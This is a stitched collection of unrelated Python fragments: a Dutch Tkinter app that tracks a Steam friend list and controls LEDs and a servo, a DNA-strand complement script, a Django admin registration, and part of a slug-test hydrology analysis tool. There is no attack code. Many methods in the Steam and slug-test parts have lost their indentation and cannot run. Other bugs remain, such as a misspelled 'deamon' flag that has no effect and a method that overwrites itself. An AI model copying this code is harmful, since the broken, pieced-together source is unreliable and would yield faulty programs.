        self.berichtframe.forget()
        self.user_label.forget()
        self.favoriet_label.forget()
        self.msg_button.forget()
        self.clear_button.forget()
        self.friendframe.forget()
        self.servobuttonframe.forget()
        if self.treeview is not None:
            self.treeview.forget()
            self.treeview = None

    def start_gui(self):
        """Enter the Tk mainloop (blocks until the window is destroyed)."""
        self.root.mainloop()
    def start_sensoren(self, loginbtnstart):
        """Start friend-list polling and the hardware sensors; create the login
        button when *loginbtnstart* is set."""
        self.runfriendlist = True
        self.runonline = True
        self.toon_friendlist()
        self.neopixel = Neopixel()
        self.neopixel.speel_loginanimatie()
        self.sr04 = Sr04(self.client, self.neopixel)
        self.sr04.start()
        if loginbtnstart:
            self.loginbutton = LoginButton(self)

    def stop_sensoren(self, loginbtndelete):
        """Stop all sensors and join any running timers (max 5s each)."""
        if self.neopixel is not None:
            self.neopixel.speel_loguitanimatie()
        if self.schuifregister is not None:
            self.schuifregister.lichtjes(0)
        self.favoriet = None
        self.runfriendlist = False
        self.runonline = False
        if self.onlinetimer is not None:
            self.onlinetimer.join(5)
        if self.schuifregister is not None:
            self.schuifregister.lichtjes(0)
        if self.friendlist_timer is not None:
            self.friendlist_timer.join(5)
        if self.sr04 is not None:
            self.sr04.stop()
        if loginbtndelete:
            if self.loginbutton is not None:
                self.loginbutton.lights_out()
                self.loginbutton = None
def toon_friendlist(self):
""" Deze functie laadt de vriendlijst uit steam,
stopt hem in een treeview en herheelt dit iedere 10 seconden."""
if self.runfriendlist:
try:
data = self.api.get_friend_list(steamid=self.client.get_client().steam_id.as_64)
except HTTPError:
return
online = 0
friendlist = []
try:
friendjson = data['friendslist']['friends']
for friend in friendjson:
try:
games = self.api.friendstatus(friend['steamid'])
status = games['response']['players'][0]['personastate']
naam = games['response']['players'][0]['personaname']
if not (status == 0 or status == 7):
online += 1
if status == 0:
status = "Offline"
elif status == 1:
status = "Online"
elif status == 2:
status = "Bezig"
elif status == 3:
status = "Afwezig"
elif status == 4:
status = "Slapend"
elif status == 5:
status = "Ruilzoekende"
elif status == 6:
status = "Spelzoekende"
elif status == 7:
status = "Fake offline"
elif status == 8:
status = "max"
else:
status = "onbekend"
friendlist.append([naam, status, friend['steamid']])
except KeyError:
pass
except KeyError:
pass
self.schuifregister = Schuifregister()
self.schuifregister.lichtjes(online)
if online != self.online:
self.online = online
koppen = ('Naam', 'Status')
if self.treeview is not None:
try:
self.treeview.delete(*self.treeview.get_children())
except TclError:
return
else:
try:
self.treeview = ttk.Treeview(self.friendframe, columns=koppen, show='headings')
except RuntimeError:
return
scrollbar = Scrollbar(self.friendframe)
self.treeview.config(yscrollcommand=scrollbar.set)
self.treeview.pack(expand=1, fill=BOTH)
scrollbar.config(command=self.treeview.yview)
self.collijst = []
for col in koppen:
self.collijst.append(col)
if self.treeview is not None:
self.treeview.heading(col, text=col,
command=self.treeview_sort_column)
else:
return
self.sorteer_data(friendlist)
if self.treeview is not None:
for friend in friendlist:
self.treeview.insert("", "end",
values=(friend[0], friend[1], friend[2]))
if self.selecteditem is not None:
for i in self.treeview.get_children():
try:
if self.treeview.item(i)['values'][2] == self.favoriet:
self.treeview.focus(i)
self.treeview.selection_set(i)
except TclError:
pass
self.sort_column_noclick()
self.friendlist_timer = threading.Timer(10, self.toon_friendlist)
self.friendlist_timer.deamon = True
self.friendlist_timer.start()
else:
return
else:
return
    def stop(self):
        """Shut down the application."""
        # NOTE(review): the window is destroyed before the sensors are stopped;
        # consider reversing the order so timers are joined while the widget
        # tree is still intact.
        self.root.destroy()
        self.stop_sensoren(True)
        raise SystemExit
def check_online(self):
""" Deze functie volgt de geselecteerde gebruiker van de treeview, update iedere 2 seconden."""
if self.favoriet is not None and self.treeview is not None and self.runonline:
try:
self.selecteditem = self.treeview.focus()
if self.selecteditem == "":
return
except IndexError:
return
self.afsluitButton.forget()
try:
friend_name = self.treeview.item(self.selecteditem)['values'][0]
except IndexError:
return
except AttributeError:
return
except TclError:
return
favoriet = self.treeview.item(self.selecteditem)['values'][2]
if self.favoriet != favoriet:
self.favoriet = favoriet
self.favoriet_label["text"] = f"Huidige favoriet: {friend_name}"
servo = Servo()
data = self.api.friendstatus(self.favoriet)
status = data['response']['players'][0]['personastate']
if status != self.status:
servo.start_spel(status)
self.status = status
self.onlinetimer = threading.Timer(2, self.check_online)
self.onlinetimer.deamon = True
self.onlinetimer.start()
elif self.favoriet is None and self.treeview is not None and not self.runonline:
self.runonline = True
self.favoriet_label["text"] = f"Huidige favoriet: geen"
self.favoriet = "begin"
else:
return
def log_out(self):
""" Callback functie voor de button, logt de gebruiker uit en sluit alle sensoren af."""
try:
self.client.log_out()
except LoopExit:
pass
self.clear_gui(False)
self.stop_sensoren(False)
if self.friendlist_timer is not None:
self.friendlist_timer.join(5)
if self.onlinetimer is not None:
self.onlinetimer.join(5)
self.client = None
def log_in(self):
""" Callback functie voor de button, logt de gebruiker in en start de gui + sensoren op"""
self.neopixel.speel_loginanimatie()
self.client = SteamClientAPI(self.username, self.password)
self.client.open_client()
self.favoriet = "begin"
self.afsluitButton.forget()
self.open_gui(True)
self.start_sensoren(False)
    def timerstop(self):
        """Stop following the selected user after the button was pressed.

        Resets the favourite sentinel, rebuilds the GUI and the friend list
        and re-enables online polling.
        """
        if self.selecteditem is None or self.selecteditem == "":
            return
        self.favoriet = "begin"
        self.runfriendlist = False
        if self.treeview is not None:
            self.treeview.forget()
        self.clear_gui(True)
        self.open_gui(True)
        if self.onlinetimer is not None:
            # Wait (max 5 s) for the online-poll timer to finish.
            self.onlinetimer.join(5)
        self.runfriendlist = True
        self.toon_friendlist()
        self.runonline = True
        self.favoriet_label["text"] = f"Huidige favoriet: geen"
    def open_data(self):
        """Open the data screen.

        Stops the sensors, clears the GUI and switches the NeoPixel off
        before handing control to the DataScherm window.
        """
        self.stop_sensoren(True)
        self.clear_gui(True)
        self.neopixel.lights_out()
        self.favoriet = "begin"
        DataScherm(self.client, self.root, self)
def sorteer_data(self, data):
""" Deze funtie sorteert de ingevoerde data."""
quicksort = Quicksort(data)
quicksort.quicksortRecusrive(data, 0, len(data) - 1)
def treeview_sort_column(self):
"""Deze functie sorteert de koppen van de treeview als er op de kop is gedrukt"""
koppenlijst = []
for kop in self.treeview.get_children(''):
koppenlijst.append(kop)
copylijst = koppenlijst.copy()
copylijst.reverse()
for kop in koppenlijst:
self.treeview.move(kop, '', copylijst.index(kop))
self.needs2bsorted = not self.needs2bsorted
def sort_column_noclick(self):
""" Deze fucntie sorteert de kolommen als dat nodig is en de vriendlijst wordt refreshed."""
koppenlijst = []
for kop in self.treeview.get_children(''):
koppenlijst.append(kop)
copylijst = koppenlijst.copy()
if self.needs2bsorted:
copylijst.reverse()
for kop in koppenlijst:
self.treeview.move(kop, '', copylijst.index(kop))
    def open_statistiek(self):
        """Open the statistics screen.

        Stops the sensors, clears the GUI and switches the NeoPixel off
        before handing control to the Statistiek window.
        """
        self.stop_sensoren(True)
        self.clear_gui(True)
        self.neopixel.lights_out()
        self.favoriet = "begin"
        Statistiek(self.client, self.root, self)
|
# Build the complementary DNA strand: A<->I and C<->G are swapped,
# every other character (e.g. the '-' separators) is copied unchanged.
dna_strand_1 = "ATC-CGG-GAC-CAG-CIG-GCC-GTC" #TAG-GCC-CTG-GTC-GAC-CGG-CAG
dna_strand_2 = ""
for char in dna_strand_1:
    print(char, end="',")
    # BUG FIX: the original used independent `if` statements, so e.g. an 'A'
    # first appended 'I' and then also fell into the final `else` (which only
    # belonged to the 'G' check), appending the original character a second
    # time. An elif-chain maps each base to exactly one output character.
    if char == "A":
        dna_strand_2 += "I"
    elif char == "I":
        dna_strand_2 += "A"
    elif char == "C":
        dna_strand_2 += "G"
    elif char == "G":
        dna_strand_2 += "C"
    else:
        # NOTE(review): 'T' is copied as-is although the comment next to
        # dna_strand_1 suggests an A<->T complement was intended -- confirm
        # whether 'I' is a deliberate substitute for 'T'.
        dna_strand_2 += char
print(dna_strand_2)
|
from django.contrib import admin

from .models import Customer, Shouhin, Accounting

# Register this app's models with the default admin site.
for model in (Customer, Shouhin, Accounting):
    admin.site.register(model)
# -*- coding: utf-8 -*-
"""
For analysis of rising head slug tests
Documentation: RSAT_0.2.2_usermanual.pdf
Written in python 3.7 by Annabel Vaessens and Gert Ghysels
January 2020
#"""
import time
import itertools
import math
import matplotlib.pyplot as plt
import matplotlib.backends.backend_tkagg as pltb
import numpy as np
import os
import pandas as pd
import string
import tkinter as tk
########################### FUNCTIONS ###############################
class Program:
    def newDirectory(self): #changes the directory: this will be the map that opens when opening and saving files
        """Ask the user for a working directory and chdir into it.

        Shows the (truncated) chosen path in the GUI; relies on the
        module-level widgets/variables GUI, i and j.
        """
        # NOTE(review): assigning to self.newDirectory shadows this bound
        # method on the instance, so a second call raises TypeError ('str'
        # object is not callable). SaveFig reads this same attribute as the
        # initial directory, so renaming it must be coordinated with SaveFig.
        self.newDirectory= tk.filedialog.askdirectory()
        tk.Label(GUI, text=self.newDirectory[-35:],font=("Helvetica", "8"), width='32', foreground='navy').grid(row=i-1, column=j)
        os.chdir(self.newDirectory)
    def OpenFile(self): # opens file where the horizontal hydraulic conductivity calculations are performed on
        """Open a .dat file and load it into self.dfRAWDATA.

        The file is read whitespace-delimited with ',' as decimal separator
        and fixed column names; a message box warns when values cannot be
        converted to float. The chosen file name is stored in self.filename
        and shown in the GUI (module-level GUI, i, j).
        """
        self.ListNamesCols=[]
        filenameDir=tk.filedialog.askopenfilename(filetypes = [("DAT files","*.dat"),("All Files","*")])
        self.RAWDATA=pd.read_csv(filenameDir,decimal=',',delim_whitespace=True,header=None, names=['Time [T]','Transducer [(M*L²)/(T³*I)]','Head [L, non SI]','Head [L]','Pressure [M/(T²*L)]'])
        try:
            self.dfRAWDATA=pd.DataFrame(self.RAWDATA.astype(float))
        except ValueError:
            tk.messagebox.showerror("Warning", "The input file contains characters, which cannot be converted to float (literals or wrong/mixed decimal seperators) \nOnly '.' OR ',' are allowed as seperator!")
        self.filename=str(filenameDir.split('/')[-1]) # gives the file name you have selected
        self.ListNamesCols=['Time [T]', self.filename]
        tk.Label(GUI, text=self.filename,font=("Helvetica", "9"), foreground='navy').grid(row=i+1, column=j)
    def SaveFig(self): # to save figures that are created
        """Ask for a file name and export the current self.Figure as a PDF."""
        NameFig=tk.filedialog.asksaveasfilename(title= 'Save as', confirmoverwrite=True, initialdir=self.newDirectory)
        self.Figure.savefig(NameFig + '.pdf', bbox_inches='tight')
    def Canvas(self, figure, m, r, c): # to make a canvas and display the figure in a pop-up window
        """Embed matplotlib `figure` in Tk master `m` at grid position (r, c)."""
        canvas = pltb.FigureCanvasTkAgg(figure, master=m)
        canvas.draw()
        canvas.get_tk_widget().grid(row=r, column=c)
    def PlotDataSeperateBox(self): # plots the imported data in a pop-up window
        """Show the loaded raw head-time series in a Toplevel window.

        Adds Save/Close buttons and stores the figure in self.Figure so
        SaveFig can export it.
        """
        box = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
        box.title("Data "+ self.filename )
        FigRawData = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
        plt.title(self.filename, fontsize=16)
        ax1 = FigRawData.add_subplot(111)
        self.dfRAWDATA.plot(x='Time [T]', y='Head [L]',ax=ax1)
        plt.ylabel('Head [L]', fontsize=14)
        plt.xlabel('Time [T]', fontsize=14)
        # Axis limits padded proportionally to record length (x) and by 20
        # head units (y).
        plt.axis([self.dfRAWDATA.iloc[0,0]-len(self.dfRAWDATA)/60,self.dfRAWDATA.iloc[-1,0]+len(self.dfRAWDATA)/60,min(self.dfRAWDATA.iloc[:,3])-20,max(self.dfRAWDATA.iloc[:,3])+20])
        self.Canvas(FigRawData,box, 0,0)
        self.Figure=FigRawData # for using in the save-function
        tk.Button(box, text="Save figure", command=self.SaveFig, width=10).grid(row=2,column=2) # option to save the figure
        tk.Button(box, text="Close", command=box.destroy, width=10).grid(row=3,column=2) # option to close the pop up window
    # making a clickable graph in a pop-up window, where the boundaries of individual measurements can be clicked
    def ClickableGraph(self):
        """Show the raw data and collect 2*NM clicked boundary points.

        The clicks (start/end per measurement) are flattened into
        self.BoundPoints as [x0, y0, x1, y1, ...].
        """
        self.PlotDataSeperateBox()
        self.NumPoints=int(NM.get())*2 # two times the amount of measurements need to be clicked
        BoundPoints1=list(plt.ginput(self.NumPoints, show_clicks=True)) # list makes a list of the tuple that ginput gives
        self.BoundPoints=list(itertools.chain.from_iterable(BoundPoints1))
    # splitting the imported data in individual measurements with the clicks defined in ClickableGraph()
    def SplitRawData(self):
        """Split the raw data into individual measurements and save each one.

        For each pair of clicked boundary points the nearest data points are
        found (Euclidean distance in the time/head plane) and the slice in
        between is written to '<name>_proc<A..Z>.dat' in the working
        directory.
        """
        x=0
        y=1
        while (x < len(self.BoundPoints)-1): #(len(BoundPoints)-1)/4 is the amount of repetitions needed, this is equal to the amount of measurements
            DistFirstPoint=[]
            DistSecondPoint=[]
            RAWDATASliced=[]
            for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
                DistFirstPoint.append(math.sqrt((self.BoundPoints[x]-self.dfRAWDATA.iloc[P,0])**2 + (self.BoundPoints[y]-self.dfRAWDATA.iloc[P, 3])**2 ))
                DistSecondPoint.append(math.sqrt((self.BoundPoints[x+2]-self.dfRAWDATA.iloc[P,0])**2 +(self.BoundPoints[y+2]-self.dfRAWDATA.iloc[P, 3])**2 ))
            FirstPoint_Data=min(DistFirstPoint)
            SecondPoint_Data=min(DistSecondPoint)
            IndexFirstPoint=DistFirstPoint.index(FirstPoint_Data)
            IndexSecondPoint=DistSecondPoint.index(SecondPoint_Data)
            RAWDATASliced=self.dfRAWDATA[IndexFirstPoint:IndexSecondPoint+1]
            # Measurements are suffixed A, B, C, ... in click order.
            self.RepeatMeas=list(string.ascii_uppercase)
            RAWDATASliced.to_csv(self.filename[:-4]+'_proc'+self.RepeatMeas[int(x/4)]+'.dat', header=False, index=False, sep=' ')
            x=x+4
            y=y+4
        tk.messagebox.showinfo('Info', 'Splitting in individual measurements was successful. You can find them in the current working directory.')
    # function that opens multiple (or one) individual measurements, let the user define location of the baselevel and splits the data (from the minimum head to the recovered head or end of the data)
    def RepeatabilityOpen(self):
        """Open one or more processed measurements for repeatability analysis.

        For every selected .dat file the user clicks the last base-level
        point in a pop-up; SplitProcData() then slices and normalizes the
        measurement, and the results are accumulated column-wise in
        self.DFSlicedNormHead_Rep.
        """
        self.BaseLevelList=[]
        self.BaseLevelListLL=[]
        self.listNamesRepMeas_H=[] # list with only the names of the columns containing head data
        self.listNamesRepMeas_TH=[] # list with the column names of the repeated measurements that were selected
        self.Q=0
        self.H0_Blist=[]
        try:
            filenameDir=tk.filedialog.askopenfilenames(filetypes = [("DAT files","*.dat"),("All Files","*")])
            filenameDirList=list(filenameDir)
            self.DFSlicedNormHead_Rep=pd.DataFrame()
            while self.Q < len(filenameDirList):
                self.DATA=pd.read_csv(filenameDirList[self.Q],decimal=',',delim_whitespace=True,header=None, names=['Time [T]','Transducer [(M*L²)/(T³*I)]','Head [L, non SI]','Head [L]','Pressure [M/(T²*L)]'])
                self.dfDATA=pd.DataFrame(self.DATA.astype(float))
                filenameRepeat=str((filenameDir[self.Q].split('/')[-1]).split('.')[0])
                self.listNamesRepMeas_H.append(filenameRepeat)
                self.listNamesRepMeas_TH.append('Time_'+filenameRepeat)
                self.listNamesRepMeas_TH.append(filenameRepeat)
                tk.Label(GUI, text=filenameRepeat,font=("Helvetica", "9"), foreground='navy').grid(row=i+11+self.Q, column=j+1, columnspan=2, sticky='W')
                #open a new pop-up window
                box2 = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
                box2.title("Data "+ filenameRepeat+ ' -- Indicate the last baselevel value')
                FigRepBaselvl = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
                plt.title('Indicate the last baselevel value', fontsize=16)
                ax2 = FigRepBaselvl.add_subplot(111)
                self.dfDATA.plot(x='Time [T]', y='Head [L]',ax=ax2)
                plt.xlabel('Time [T]', fontsize=14)
                plt.ylabel('Head [L]', fontsize=14)
                self.Canvas(FigRepBaselvl, box2, 0,0)
                # One click per file; coordinates are appended flat as
                # [x0, y0, x1, y1, ...] in self.BaseLevelList.
                BaseLevel=list(itertools.chain.from_iterable(plt.ginput(1, show_clicks=True)))
                self.BaseLevelListLL.append(BaseLevel)
                self.BaseLevelList= [val for sublist in self.BaseLevelListLL for val in sublist]
                self.SplitProcData()
                box2.destroy()
                self.Q=self.Q+1
            self.DFSlicedNormHead_Rep.columns=self.listNamesRepMeas_TH
        except ValueError:
            tk.messagebox.showerror("Warning", "The input file contains characters, which cannot be converted to float (literals or wrong/mixed decimal seperators) \nOnly '.' OR ',' are allowed as seperator!")
    # used in RepeatabilityOpen; splits the data file into the part used for the normhead-time curves (from the minimum head to the recovered head or end of the data)
    def SplitProcData(self):
        """Slice measurement self.Q from its extreme head to recovery.

        The base level is the mean of the ten points before the clicked
        point. Depending on the test type (STlabel 'F' falling / 'R'
        rising) the slice starts at the maximum/minimum head and runs until
        the head recovers to the base level (or the record ends). The slice
        is normalized and appended to self.DFSlicedNormHead_Rep.
        """
        self.DFSlicedNormHead_Rep_1Meas=pd.DataFrame()
        DistBaseLevel=[]
        for P in range(0,self.dfDATA.count(axis='rows')[0]):
            DistBaseLevel.append(math.sqrt((self.BaseLevelList[self.Q*2]-self.dfDATA.iloc[P,0])**2 + (self.BaseLevelList[(self.Q*2)+1]-self.dfDATA.iloc[P,3])**2 )) #oke
        MinDistBaseLevel=min(DistBaseLevel)
        IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
        BaseLevel=np.mean(self.dfDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3]) # baselevel is average of ten points before the clicked point
        if STlabel.get()=='F': # falling head slug tests
            StartHead2=max(self.dfDATA.iloc[:,3]) # maximum of the dataset if it is falling head slug test
            IndexStart2=self.dfDATA['Head [L]'].idxmax()
            k=IndexStart2
            while (self.dfDATA.iloc[k,3]>= BaseLevel) and (self.dfDATA.iloc[k,3] > self.dfDATA.iloc[-1,3]):
                k=k+1
            if self.dfDATA.iloc[k,3] > BaseLevel:
                tk.messagebox.showinfo("Warning", "Recovery is not reached for this measurement")
        if STlabel.get()=='R': # for rising head slug tests
            StartHead2=min(self.dfDATA.iloc[:,3])
            IndexStart2=self.dfDATA['Head [L]'].idxmin()
            k=IndexStart2
            while (self.dfDATA.iloc[k,3]<= BaseLevel) and (self.dfDATA.iloc[k,3] < self.dfDATA.iloc[-1,3]):
                k=k+1
            if self.dfDATA.iloc[k,3] < BaseLevel:
                tk.messagebox.showinfo("Warning", "Recovery is not reached for this measurement")
        # H0+ for this measurement: initial displacement relative to baselevel.
        self.H0_B=BaseLevel-StartHead2
        self.H0_Blist.append(self.H0_B)
        self.DFSlicedNormHead_Rep_1Meas[self.listNamesRepMeas_TH[2*self.Q]]=self.dfDATA.iloc[IndexStart2:k,0]
        self.DFSlicedNormHead_Rep_1Meas[self.listNamesRepMeas_TH[2*self.Q+1]]=self.dfDATA.iloc[IndexStart2:k,3]
        for w in range (0,k-IndexStart2):
            self.DFSlicedNormHead_Rep_1Meas.iloc[w,1]=(BaseLevel-self.DFSlicedNormHead_Rep_1Meas.iloc[w,1])/(BaseLevel- StartHead2) # normalized head of the sliced part (minhead to baselevel)
            self.DFSlicedNormHead_Rep_1Meas.iloc[w,0]=self.DFSlicedNormHead_Rep_1Meas.iloc[w,0]-self.dfDATA.iloc[IndexStart2,0] # we need the time for each measurement in order to plot measurements with different frequencies on one graph
        self.DFSlicedNormHead_Rep=pd.concat((self.DFSlicedNormHead_Rep, self.DFSlicedNormHead_Rep_1Meas),ignore_index=True, axis=1)
    # general settings to plot the normalized head vs time curves in a pop-up window
    # used in PlotNormHead_Time() and PlotNormHead_LogTime()
    def Multi_plot(self, title,label,xscale):
        """Plot all loaded normalized-head curves in one pop-up window.

        Parameters: window `title`, figure `label` and the x-axis `xscale`
        ('linear' or 'log'). Adds Save/Close buttons and stores the figure
        in self.Figure for SaveFig.
        """
        box3 = tk.Toplevel(background='#B4D0E9')
        box3.title( title +" "+", ".join(str(x) for x in self.listNamesRepMeas_H))
        RepFig = plt.figure(figsize=(13,8),facecolor='#B4D0E9') # RepFig stands for 'Repeated measurements figures'
        plt.title(label, fontsize=16)
        ax4 = RepFig.add_subplot(111)
        ax4.set(xscale = xscale )
        plt.xlabel('Time [T]', fontsize=14)
        plt.ylabel('Normalized head [-]', fontsize=14)
        # NOTE(review): this local `i` shadows the module-level `i` used for
        # grid placement elsewhere -- the initialisation is also redundant
        # because the for-loop rebinds it.
        i=0
        for i in range(0, len(self.listNamesRepMeas_TH)-1,2):
            plt.plot(self.DFSlicedNormHead_Rep[self.listNamesRepMeas_TH[i]], self.DFSlicedNormHead_Rep[self.listNamesRepMeas_TH[i+1]]) # plotting in this way makes the frequency of the data incorporated by itself
        plt.legend(self.listNamesRepMeas_H, fontsize='large')
        self.Canvas(RepFig,box3,1,0)
        self.Figure=RepFig # to use in SaveFig-function
        tk.Button(box3, text="Save figure", command=self.SaveFig, width=10).grid(row=2,column=2)
        tk.Button(box3, text="Close", command=box3.destroy, width=10).grid(row=3,column=2)
def PlotNormHead_Time(self): # specific settings for the normalized head vs time curves
title = 'Normalized head versus time for'
label = 'Normalized Head versus time'
xscale='linear'
self.Multi_plot(title,label,xscale)
def PlotNormHead_LogTime(self): # specific settings for the normalized head vs log(time) curves
title = 'Normalized head versus time on semilog diagram for'
label = 'Plot normalized nead versus time on semilog diagram'
xscale='log'
self.Multi_plot(title,label,xscale)
# Bouwer-Rice calculations for unconfined aquifer, partially penetrating well
# used in PerformCalc()
def KhBouwerRice_PP(self):
coeff=math.log((self.AqThick-(self.d+self.Le))/(self.rw*math.sqrt(self.Aniso)))
if coeff > 6:
coeff=6
A = 1.4720 + 0.03537*(self.Le/(self.rw*math.sqrt(self.Aniso)))-0.00008148*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2+0.0000001028*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3-0.00000000006484*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4+0.00000000000001573*(self.Le/(self.rw*math.sqrt(self.Aniso)))**5
B = 0.2372 + 0.005151*(self.Le/(self.rw*math.sqrt(self.Aniso))) - 0.000002682*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2 - 0.0000000003491*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3 + 0.0000000000004738*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4
self.Kh_BR_PP=self.rc*self.rc*(1.1/math.log((self.d+self.Le)/(self.rw*math.sqrt(self.Aniso)))+((A+(B*coeff))/self.Le*self.rw*math.sqrt(self.Aniso)))**(-1)/(2*self.Le*self.T01)
self.Kh_BR_PP=round(self.Kh_BR_PP,5) # rounding off to five decimals
# Bouwer-Rice calculations for unconfined aquifer, fully penetrating well, used in PerformCalc()
def KhBouwerRice_FP(self):
C=0.7920+0.03993*(self.Le/(self.rw*math.sqrt(self.Aniso)))-0.00005743*(self.Le/(self.rw*math.sqrt(self.Aniso)))**2+0.00000003858*(self.Le/(self.rw*math.sqrt(self.Aniso)))**3-0.000000000009659*(self.Le/(self.rw*math.sqrt(self.Aniso)))**4
self.Kh_BR_FP=self.rc*self.rc*(1.1/math.log((self.d+self.Le)/(self.rw*math.sqrt(self.Aniso)))+(C/self.Le*self.rw*math.sqrt(self.Aniso)))**(-1)/(2*self.Le*self.T01)
self.Kh_BR_FP=round(self.Kh_BR_FP,5 )
# Hvorslev calculations for confined aquifer, partially penetrating well
def KhHvorslev_PP(self):
F=1/(2*math.sqrt(self.Aniso)/(self.Le/self.rw)) + math.sqrt(1 + (1/(2*math.sqrt(self.Aniso)/(self.Le/self.rw)))**2)
self.Kh_H_PP = (self.rc*self.rc*math.log(F)) / (2*self.Le*self.T01)
self.Kh_H_PP=round(self.Kh_H_PP,5)
# Hvorslev calculations for confined aquifer, fully penetrating well
def KhHvorslev_FP(self):
self.Kh_H_FP=(self.rc*self.rc*math.log(self.re/self.rw))/(2*self.AqThick*self.T01)
self.Kh_H_FP=round(self.Kh_H_FP,5)
    # pop-up window for the user to define the baselevel
    # used in PerformCalc()
    def DefBaseLevel(self):
        """Let the user click the last base-level point of the raw data.

        Stores the clicked (time, head) pair in self.EstBaseLevel and closes
        the pop-up again.
        """
        box4 = tk.Toplevel(background='#B4D0E9', cursor='crosshair')
        box4.title("Data "+ self.filename + ' -- Indicate the last baselevel value')
        FigBaselvl = plt.figure(figsize=(13,8),facecolor='#B4D0E9')
        plt.title('Indicate the last baselevel value '+ self.filename, fontsize=16)
        ax5 = FigBaselvl.add_subplot(111)
        self.dfRAWDATA.plot(x='Time [T]', y='Head [L]',ax=ax5)
        plt.xlabel('Time [T]', fontsize=14)
        plt.ylabel('Head [L]', fontsize=14)
        self.Canvas(FigBaselvl, box4,0,0)
        self.EstBaseLevel=list(itertools.chain.from_iterable(plt.ginput(1, show_clicks=True)))
        box4.destroy()
    # for checking whether there are limitations for certain methods.
    # used in the button 'Check limitations'
    def CheckLimitations(self):
        """Check which calculation methods are valid for this measurement.

        Slices and normalizes the data like SplitProcDataForCalc and then
        reports, based on the last normalized head reached, which
        Bouwer-Rice/Hvorslev ranges can(not) be calculated.
        """
        self.DefBaseLevel()
        DistBaseLevel=[]
        for P in range(0,self.dfRAWDATA.count(axis='rows')[0]):
            DistBaseLevel.append(math.sqrt((self.EstBaseLevel[0]-self.dfRAWDATA.iloc[P,0])**2 + (self.EstBaseLevel[1]-self.dfRAWDATA.iloc[P,3])**2 )) #oke
        MinDistBaseLevel=min(DistBaseLevel)
        IndexMinDistBaseLevel=DistBaseLevel.index(MinDistBaseLevel)
        # Base level is the mean of the ten points before the clicked point.
        self.BaseLevel=np.mean(self.dfRAWDATA.iloc[IndexMinDistBaseLevel-10:IndexMinDistBaseLevel,3])
        if STlabel.get()=='F': # for falling head slug tests
            self.StartHead=max(self.dfRAWDATA.iloc[:,3])
            self.H0=self.BaseLevel-self.StartHead
            IndexStart=self.dfRAWDATA.iloc[:,3].idxmax()
            k=IndexStart
            while (self.dfRAWDATA.iloc[k,3]>= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] > self.dfRAWDATA.iloc[-1,3]):
                k=k+1
        if STlabel.get()=='R': # for rising head slug tests
            self.StartHead=min(self.dfRAWDATA.iloc[:,3])
            self.H0=self.BaseLevel-self.StartHead
            IndexStart=self.dfRAWDATA.iloc[:,3].idxmin()
            k=IndexStart
            while (self.dfRAWDATA.iloc[k,3]<= self.BaseLevel) and (self.dfRAWDATA.iloc[k,3] < self.dfRAWDATA.iloc[-1,3]):
                k=k+1
        self.DFSlicedNormHead=pd.DataFrame([self.dfRAWDATA.iloc[IndexStart:k,0], self.dfRAWDATA.iloc[IndexStart:k,3]], index=self.ListNamesCols)
        self.DFSlicedNormHead=self.DFSlicedNormHead.transpose()
        for w in range (0,k-IndexStart):
            self.DFSlicedNormHead.iloc[w,1]=(self.BaseLevel-self.DFSlicedNormHead.iloc[w,1])/(self.H0) # normalized head of the sliced part (minhead to baselevel)
            self.DFSlicedNormHead.iloc[w,0]=self.DFSlicedNormHead.iloc[w,0]-self.dfRAWDATA.iloc[IndexStart,0] # start time for each measurement should be zero in order to plot measurements with different frequencies on one graph
        # Report which methods are limited, based on the last normalized head.
        if self.DFSlicedNormHead.iloc[-1,1]>0.30:
            tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + ', "No full recovery" and "All data" methods are limited to the range 1 - '+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. No "Best range" methods can be calculated.')
        elif self.DFSlicedNormHead.iloc[-1,1]>0.25:
            tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. Hvorslev best range cannot be calculated.' +' "All data" and "Bouwer-Rice best range" methods are limited to the range 1 - '+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)))
        elif self.DFSlicedNormHead.iloc[-1,1]>0.20:
            tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. "All data" methods are limited to the range 1 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2)) +', best range for Bouwer-Rice is limited to the range 0.30 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + ', "Hvorslev best range" method is limited to 0.25 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ '.')
        elif self.DFSlicedNormHead.iloc[-1,1]>0.15:
            tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement. Maximum normalized head is "+ str(round(self.DFSlicedNormHead.iloc[-1,1],2)) + '. "All data" methods are limited to the range 1 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ ', Hvorlsev best range is limited to the range 0.25 - '+str(round(self.DFSlicedNormHead.iloc[-1,1],2))+ '.')
        elif self.DFSlicedNormHead.iloc[-1,1]>0.035:
            tk.messagebox.showinfo("Info", "Recovery is not reached for this measurement, but all calculation methods are possible.")
        else:
            tk.messagebox.showinfo("Info", "Recovery is reached for this measurement. No limitations for calculation methods")
    # splits the data and calculates the log of the normalized heads
    # used in PerformCalc()
    def SplitProcDataForCalc(self):
        """Slice the raw data from the extreme head to recovery and prepare
        the (log-)normalized-head ranges used by the regression.

        Depending on the checked options (module-level V1..V12) the sliced,
        normalized data is subset to: all data (>= 0.035), the Bouwer-Rice
        best range (0.20-0.30), the Hvorslev best range (0.15-0.25) and the
        no-full-recovery range (0.3-1); natural logs are taken on copies.
        """
